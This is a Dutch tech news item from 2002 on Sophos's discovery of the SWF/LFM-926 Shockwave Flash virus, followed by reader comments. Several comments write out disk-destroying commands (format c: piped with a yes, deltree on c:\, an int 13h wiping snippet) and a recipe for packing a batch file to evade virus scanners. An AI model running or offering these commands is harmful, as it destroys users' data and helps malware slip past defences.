Eerste shockwave virus ontdekt

Virus Het anti-virus bedrijf Sophos heeft vandaag bekend gemaakt dat ze het eerste Shockwave-virus heeft ondekt. Het virus, SWF/LFM-926 genaamd, is niet bijzonder destructief: naast het infecteren van alle Shockwave files in de huidige directory doet het niets. Ook werkt het alleen als je de .swf file download en dan met de Shockwave Flash-player bekijkt. Het virus maakt gebruik van de mogelijkheden van Flash om scripts uit te voeren:

The virus makes use of the ability of Shockwave files to run scripts. In this case it opens a DOS box, launching the command line interpreter to run a debug script which produces a file called V.COM. This file, which is 926 bytes in length, is then automatically run by the virus infecting all other SWF files in the current directory. [break] Het virus is nog niet in het wild ontdekt, maar volgens een van de consultants van Sophos is het wel een opmerkelijke virus: [/break] "Computer users visiting snazzy sites would get more than they bargained for if they downloaded this virus," said Graham Cluley, senior technology consultant for Sophos Anti-Virus. "The Shockwave virus is not yet in the wild, but it is clear proof that virus writers continue to search for new ways to infect computer users. The best defence is to keep your security software up-to-date and practise safe computing."

Geen grote bedreiging dus, maar toch reden om de virus-scanner weer eens te updaten. Het shockwave virus is overigens niet cross-platform, de gebruikte methode werkt niet op niet-Windows systemen.

IT-banen

Reacties (59)

Japster 8 januari 2002 21:55

Ik vraag me af...... is er nu 1, maar dan ook slechts 1 persoon op de wereld die mij kan uitleggen wat nu de lol is van het verspreiden van virussen die geen ander doel hebben dan het aanbrengen van schade in andermans PC??

Fatamorgana @Japster • 8 januari 2002 22:02

Ja, dat kan ik uitleggen. Ik heb ooit (in het DOS tijdperk) eens een virusje gehad. En toen wilde ik begrijpen hoe dat ding werkte dus heb ik hem gedebugged en helemaal onderzocht. Daarna heb ik een verbeterde versie gemaakt die niet de fouten had die het origineel had, deze kon alleen COM files infecten. Nu kon ie ook EXE files en begon ie niet te klagen bij een write protected flop. Dit alles om meer te weten te komen over de werking van het OS en de leuke truukjes die je kunt uithalen.

Mijn virus werkte uitstekend, maar alleen ik heb de source en hij is nooit naar iemand anders gegaan. Het is gewoon soms interessant om dat soort dingen uit te proberen, ik heb er veel van geleerd. Alleen die dingen in het wild loslaten, dat slaat nergens op.

Anoniem: 300 @Fatamorgana • 9 januari 2002 01:14

Ach ja, good old DOS tijdperk...

Simpele batchfile:
@echo off
echo J|format c: /q /u /v:fucked

compilen met Batcom of Bat2Exec, packen met PKLITE, hex-editen om PKLITE-header eruit te halen, opnieuw packen met DIET 1.44a en daarna unpacken met PKLITE.

Onherkenbaar kleine .COM-file met leuke naam en niet te detecteren door virusscanner.
1x executen en Kansas is going bye bye...

eflukx @Anoniem: 300 • 9 januari 2002 13:53

goeie ouwe DOS tijd:

mov ah,3
mov al,255
mov cx,63
xor dx,dx
mov dx,64

int 13h

assemblen met tasm oid..
en zeg maar dag met je handje tegen je hdd...

Japster @Fatamorgana • 8 januari 2002 22:17

Kan helemaal met je meevoelen omtrent het uitzoeken hoe iets nu precies werkt. Ik kan je nog beter begrijpen als je zegt dat het een kick geeft om zoiets te verbeteren. Het enige wat ik dus niet snap, en dat ben je ook met me eens is dat je zoiets in het wild los laat. Laat het circuleren in een select groepje die je interesses deelt, en laat de rest van de alledag gebruikers met rust. Die zitten echt niet te wachten op jouw laatste technische hoogstandje!!

Robinski @Japster • 8 januari 2002 22:58

tja, en dan verbeterd iemand zo'n virus iets te goed en dan gaat dat virus zich verspreiden zonder controle en dan is straks de hele wereld de lul

of zoiets

Anoniem: 45051 @Japster • 8 januari 2002 22:03

Daar is niet veel lol aan volgens de maker van dit virus:

naast het infecteren van alle Shockwave files in de huidige directory doet het niets

Ik ben persoonlijk wel voor het zo-diep-mogelijk in technologie duiken tot je de zwakke punten hebt gevonden, "security through obscurity" is geen security.

Al was 't wel een stuk relaxeder geweest van die lui als ze 't gewoon aan MacroMedia hadden gemeld en dan pas hun kleine pest hadden losgelaten.

Sir Abarth @Anoniem: 45051 • 8 januari 2002 22:36

Al was 't wel een stuk relaxeder geweest van die lui als ze 't gewoon aan MacroMedia hadden gemeld en dan pas hun kleine pest hadden losgelaten.

Het virus is nog niet in het wild ontdekt[...]

Begrijpent lezen helpt

(Genoeg slapen ook btw, truste all

)

Anoniem: 45051 @Sir Abarth • 8 januari 2002 22:50

Het virus is nog niet in het wild ontdekt[...]
Begrijpent lezen helpt

Tja,..

Het anti-virus bedrijf Sophos heeft vandaag bekend gemaakt dat ze het eerste Shockwave-virus heeft ondekt

Mag toch hopen dat ze 't niet in hun eigen lab hebben ontdekt waar ze dat soort dingen maken

Mijn punt: Als een anti-virus bedrijf degene is die er het eerste van hoort lijkt 't me niet goed; de maker hoort er het eerst van te horen en hoort in samenwerking met degene die het lek gevonden heeft z.s.m. een fix uit te brengen, voordat iemand anders er destructieve dingen mee gaat doen.

veldmuis @Japster • 8 januari 2002 21:56

de maker staat nu op tweakers.net onder andere

dat geeft schijnbaar een kick

Anoniem: 24259 8 januari 2002 21:50

Als je automatisch scripts uitvoeren uit heb staan scheelt het je een hoop virrusen als ik het zo lees. Jammer dat het heel irritant surft

Anoniem: 36603 @Anoniem: 24259 • 8 januari 2002 23:07

Het gaat hier niet om een script dat in IE of Netscape uitgevoerd wordt, maar om een 'Flash ActionScript' virus.
Het de-activeren van de Javascripting in een browser levert dus niks op in dit geval

SilentStorm @Anoniem: 24259 • 8 januari 2002 22:22

zelfde met cookies eig.. maar dan ipv informatie virussen. Met dat verschil dat virussen meestal wel opgepikt worden door de nieuwere virusscanners

Krul 8 januari 2002 21:53

Geen grote bedreiging dus...

Nu nog niet misschien....

The virus makes use of the ability of Shockwave files to run scripts. In this case it opens a DOS box

Het volgende virus zal dus de DOS box openen en bijvoorbeeldFormat c: uitvoeren

Fatamorgana @Krul • 8 januari 2002 21:57

Als het goed is dan worden dat soort dingen toch door windows ondervangen? Die laat toch geen low level stuff toe op je HD?

Anoniem: 17192 @Fatamorgana • 8 januari 2002 22:14

(dont try this at home

)

echo y|format c:
deltree/y c:\*.*

hmm

eng

hellbringer @Anoniem: 17192 • 9 januari 2002 00:12

(dont try this at home )

Ikke dat ff probeeren natuurlijk

Jammer, werkt niet (onder Win2K dan):

C:\>echo y|format c:
Het type bestandssysteem is NTFS.
Voer de huidige volumenaam in voor station C:
Er is een onjuiste volumenaam ingevoerd voor dit station.

C:\>deltree/y c:\*.*
deltree wordt niet herkend als een interne of externe opdracht, programma of batchbestand.

Onder Win9x zal dit waarschijlijk wel werken

ycode @Anoniem: 17192 • 9 januari 2002 09:30

Onder win2000 / winxp waar jij dus blijkbaar onder test, heeft het DEL commando een /S optie om directory structuren te verwijderen.... dus deltree is al niet meer nodig.....
nog steeds eng, vind ik.

Anoniem: 41994 @Krul • 8 januari 2002 22:02

AFAIK kan je op een draaiende Windows geen format C: uitvoeren (omdat windows zelf daarop staat). Debug.exe kan je kwalijker dingen mee doen, bijvoorbeeld een achterdeur inbouwen, bedrijfsgegevens stelen (in een gerichte aanval).

Anoniem: 14842 @Anoniem: 41994 • 9 januari 2002 01:08

Het kan toch wel degelijk!
Alleen niet op een "standaard" Windows systeem.

Windows staat bij mij op F: (jaja, raid, foutje

)
Bij mij staat op C: bijvoorbeeld: al mijn MP3's, mIRC, SETIChache en andere data wat kan blijven staan als ik Windows opnieuw install.

En die partitie kan ik zonder problemen wissen d.m.v. format c: /q of /u !!

Mij OS is dan wel niet weg, maar er kan toch echt belangrijke data op staan. (5 jaar MP3's verzamelen bijvoorbeeld!

)

Azecos @Anoniem: 14842 • 9 januari 2002 09:38

En wat dan als je HDU crasht? Ik heb ook heel wat MP3-tjes maar allemaal veilig gesteld op CD-R.
Lijkt me verstandig voor jou om dat ook te doen.

Luxx @Krul • 8 januari 2002 22:39

Het volgende virus zal dus de DOS box openen en bijvoorbeeldFormat c: uitvoeren

Volgens mij kan dat niet in Windows. Maar goed, je hebt wel gelijk, echt lekker is het niet. stel je doet een "rename boot.ini bla.bla" dan ben je na de eerstvolgende reboot volgens mij wel de lul...

Kman @Krul • 9 januari 2002 00:04

deltree c:\ /y is ook een hele leuke. Het zal waarschijnlijk niet de hele hd leegmaken, maar voordat 'ie bij een bestand is gekomen die in gebruik is, is er al een hoop weg

kzie dubbel

Anoniem: 300 @Kman • 9 januari 2002 01:05

deltree c:\ /y

Die parameter bestaat niet. Onder Win9X (NL in dit geval) is de meeste effectieve manier echo J|deltree c:\windows Roeit als batchfile de helft van je Windows dir uit en is het meteen het einde van je OS.

Onder 2000/XP zit je toch echt aan rd vast en die laat geen pre-parameters toe, laat staan een full winnt-dir delete.

Anoniem: 34792 8 januari 2002 22:33

Wanneer wordt er nou eens gestopt met het overal in inbouwen van support voor scripting? Waarvoor heb je in hemelsnaam dit zoort scripting nodig in een flash-presentatie?
Binnen flash/shockwave heb je wel zoiets nodig, maar met het OS moet flash toch helemaal niets te maken kunnen hebben!
Hetzelfde geldt voor bijvoorbeeld MS Word: scripting binnen de aplicatie is erg handig, maar ik hoef verder niet vanuit een document het register in of een bestand te wissen.

edit:
Bad spellers of the world untie!

Kman @Anoniem: 34792 • 8 januari 2002 23:59

De grap van flash is, is dat je naast flashmovies voor websites ook standalone apps kan maken in flash (zogeheten 'projectors'). En .swfjes kan je ook buiten browsers om bekijken in een apart flashplayer programma. 't Zou wel lullig zijn als het voor de standalone versie (die feitelijk niets anders is dan een .exe versie van de .swf, met de plugin functies erbij geplakt) niet mogelijk is om alle (handige! vooral voor flashgames

) scripting-mogelijkheden te kunnen benutten.

Kben trouwens best wel benieuwd hoe ze een flashmovie zover krijgen om iets te draaien in een dosbox.

RM-rf @Kman • 9 januari 2002 00:18

denk bijvoorbeeld aan 'All Your Base are belong to us'
alhoewel ik moet zeggen dat op zo'n manier een virus verspreiden wel lastig is, immers zodra mensen het virus bemerken zullen ze snel genoeg anderen hiervoor waarschuwen, verder is dit redelijk tracable zodra je hiervoor webruimte moet hebben en kunnen providers mogelijk ingrijpen.

gevaarlijker is dan bv. verspreiding via e-mail op de methode 'hello, look at this funny movie', maar veel gebruikers hebben al veel reserveringen hiertegen, verder is een virus dat gebruik maakt van zware bestanden (.swf is in kb's vaak wat steviger dan de standaard .vbs)

hoe het werkt, waarschijnlijk via de getUrl()-functie binnen actionscript, op het web kan dat enkel public url's opvragen en geen file:, maar lokaal kan dat verdomd veel, waarschijnlijk ook rundll.exe runnen

Kman @RM-rf • 9 januari 2002 00:35

geturl? net effe geprobeerd, getURL naar C:\windows\notepad.exe geeft dan een HTTP request naar dat bestand, en dan gaat internet explorer in dit geval doodleuk vragen of je c:\windows\notepad.exe wilt opslaan, of direct starten vanaf huidige locatie

Khep net een functie gevonden dat externe programma's direct kan opstarten. Dit werkt dan alleen als je de .swf file buiten een browser (dus in de flashplayer) of als standalone (.exe) draait.

Maar... volgens de macromedia documentatie kan die functie geen bestanden openen met die applicatie, maar alleen de applicatie zelf opstarten.

Blijkbaar schijnt er wel een trucje te zijn om een applicatie wat parameters mee te geven..

Spider.007 @Kman • 9 januari 2002 13:02

dmv. het programma Swiff Canvas kun je dos opdrachten uitvoeren.

boesOne @Anoniem: 34792 • 9 januari 2002 08:15

[edit]Bad spellers of the world untie![/edit]

Werelds slechte uitsprekers van spreuken doe je stropdas af ?

Klinkt een beetje als 'Romanum eunt Domum' uit the Life of Brian..

erg overbodig...kweet het

Rick Brands 8 januari 2002 21:53

Je kon het verwachten dat ook dit soort dingen met virussen besmet zouden worden!

Op het laatst is er geen programma wat nog veilig is. Maar ja hoe meer mensen het gebruiken hoe meer virussen er voor zo'n platform komen.

Dit wordt toch steeds meer een reden om van Windows af te stappen voor veel mensen nu alleen nog iets meer gebruiksvriendelijker en dit scheelt toch weer een heleboel infecties al is het alleen maar omdat niet alle mensen windows gebruiken.

Firefly III @Rick Brands • 8 januari 2002 21:57

*knip knip*

Laat ik het bericht maar eens goed doorlezen

tweakerbee @Firefly III • 8 januari 2002 21:59

Lees: Non-Windows OS'en zijn niet gevoelig voor dit systeem. Staat in de post.

Anoniem: 26351 8 januari 2002 23:49

Het virus is nog niet in het wild ontdekt, maar volgens een van de consultants van Sophos is het wel een opmerkelijke virus:

hoe komt hij er dan aan? zelf gemaakt ofzo? toppunt van hoe bezorg ik mezelf werk....

Anoniem: 300 @Anoniem: 26351 • 9 januari 2002 01:23

Deze gasten zijn een complete Anti-Virus laboratorium ansich. Ze doen niets anders en zijn vrijwel altijd als eerste met de meldingen en oplossingen.

Wij gebruiken SAV al 3 jaar (kost wel een bom duiten) maar echt ALLES wordt tegengehouden.

No spam, slechts hulde aan deze Britse vrienden.

Scraper @Anoniem: 300 • 9 januari 2002 10:27

Mee eens, een klant van mij gebruikt het en ik ben blij verrast.

Anoniem: 1972 9 januari 2002 01:14

Jeez, iedereen die een redelijke kennis heeft van lingo weet dat je redelijk makkelijk een virus kunt bouwen met director (ook shockwave), zelfs vanuit de browser moet dit kunnen. Je kan bijvoorbeeld iets schrijven waardoor iemands computer direct afsluit op het moment dat ie opstart (redelijk onschuldig maar wel irritant) of zelfs files verwijderen. Allemaal mogelijk, zolang je maar handig genoeg bent.

(PS, ik doe dit soort dingen zelf niet, geef het alleen ff aan!!!)

En Kman, je kunt wel bestanden door programma's laten openen.

Als je trouwens lokaal een director file runt kun je helemaal met iemands pc gaan kutten. Alle xtra's die voor director beschikbaar zijn geven je daarvoor voldoende openingen, zoals dll's runnen (dus ook rundll.exe) etc.

Kman @Anoniem: 1972 • 9 januari 2002 17:19

dit virus ging volgens mij over shockwave FLASH, en niet met director gemaakte shockwave movies:

. Ook werkt het alleen als je de .swf file download en dan met de Shockwave Flash-player bekijkt.

.swf was flash, en .dcr waren (internet-)shockwave exports. 't lijkt me zowiezo onmogelijk (tenminste, dat is tot dusver nog niet mogelijk gezien) om via de shockwave en shockwave flash browser plugins programma's te starten.

svanuden 8 januari 2002 21:51

Ow fijn zal ook niet de laatste zijn

Terwijl Flash juist in de groei was

bolke @svanuden • 9 januari 2002 07:40

Flash in de groei, dat is waar
Dus ook de personen die daar MISBRUIK van maken.

Mickos 8 januari 2002 21:56

de gebruikte methode werkt niet op niet-Windows systemen.

Dat wordt dan Flashen op me Linuxbak of al mijn Flashfilmpjes in aparte mappen zetten

Met een beetje geluk brengt Macromedia gewoon een patch uit om dit te voorkomen maar het lijkt me zelf nogal moeilijk omdat je moeilijk helemaal geen scripts kunt laten uitvoeren.

-=bas=- 8 januari 2002 21:56

Ik ben ge'shock'ed

Op dit item kan niet meer gereageerd worden.

Eerste shockwave virus ontdekt

Lees meer

IT-banen

Reacties (59)

Sorteer op:

Weergave: